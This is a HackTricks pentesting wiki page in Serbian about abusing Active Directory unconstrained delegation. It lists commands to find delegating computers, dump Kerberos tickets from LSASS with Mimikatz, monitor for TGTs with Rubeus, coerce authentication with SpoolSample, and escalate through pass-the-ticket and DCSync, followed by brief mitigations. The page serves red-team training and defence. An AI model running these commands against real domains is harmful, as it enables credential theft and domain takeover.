5.7 KiB
Unconstrained Delegation
{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Unconstrained delegation
Ovo je funkcija koju Administrator domena može postaviti na bilo koji računar unutar domena. Tada, svaki put kada se korisnik prijavi na računar, kopija TGT-a tog korisnika će biti poslata unutar TGS-a koji obezbeđuje DC i sačuvana u memoriji u LSASS-u. Dakle, ako imate privilegije Administratora na mašini, moći ćete da izvučete karte i pretvarate se da ste korisnici na bilo kojoj mašini.
Dakle, ako se administrator domena prijavi na računar sa aktiviranom funkcijom "Unconstrained Delegation", a vi imate lokalne admin privilegije unutar te mašine, moći ćete da izvučete kartu i pretvarate se da ste Administrator domena bilo gde (domen privesc).
Možete pronaći objekte računara sa ovom atributom proveravajući da li atribut userAccountControl sadrži ADS_UF_TRUSTED_FOR_DELEGATION. To možete uraditi sa LDAP filtrima ‘(userAccountControl:1.2.840.113556.1.4.803:=524288)’, što je ono što powerview radi:
# List unconstrained computers
## Powerview
Get-NetComputer -Unconstrained #DCs always appear but aren't useful for privesc
## ADSearch
ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname,operatingsystem
# Export tickets with Mimikatz
privilege::debug
sekurlsa::tickets /export #Recommended way
kerberos::list /export #Another way
# Monitor logins and export new tickets
.\Rubeus.exe monitor /targetuser:<username> /interval:10 #Check every 10s for new TGTs
Učitajte kartu Administratora (ili korisnika žrtve) u memoriju sa Mimikatz ili Rubeus za Pass the Ticket.
Više informacija: https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/
Više informacija o Unconstrained delegation na ired.team.
Force Authentication
Ako napadač može da kompromituje računar koji je dozvoljen za "Unconstrained Delegation", mogao bi da prevari Print server da automatski prijavi protiv njega čuvajući TGT u memoriji servera.
Tada bi napadač mogao da izvrši Pass the Ticket napad da se pretvara da je korisnički račun Print servera.
Da biste naterali print server da se prijavi na bilo koju mašinu, možete koristiti SpoolSample:
.\SpoolSample.exe <printmachine> <unconstrinedmachine>
Ako je TGT sa kontrolera domena, možete izvršiti a DCSync attack i dobiti sve hešove sa DC-a.
Više informacija o ovom napadu na ired.team.
Evo drugih načina da pokušate da primorate autentifikaciju:
{% content-ref url="printers-spooler-service-abuse.md" %} printers-spooler-service-abuse.md {% endcontent-ref %}
Ublažavanje
- Ograničite DA/Admin prijave na specifične usluge
- Postavite "Nalog je osetljiv i ne može biti delegiran" za privilegovane naloge.
{% hint style="success" %}
Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Podrška HackTricks
- Proverite planove pretplate!
- Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.
- Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.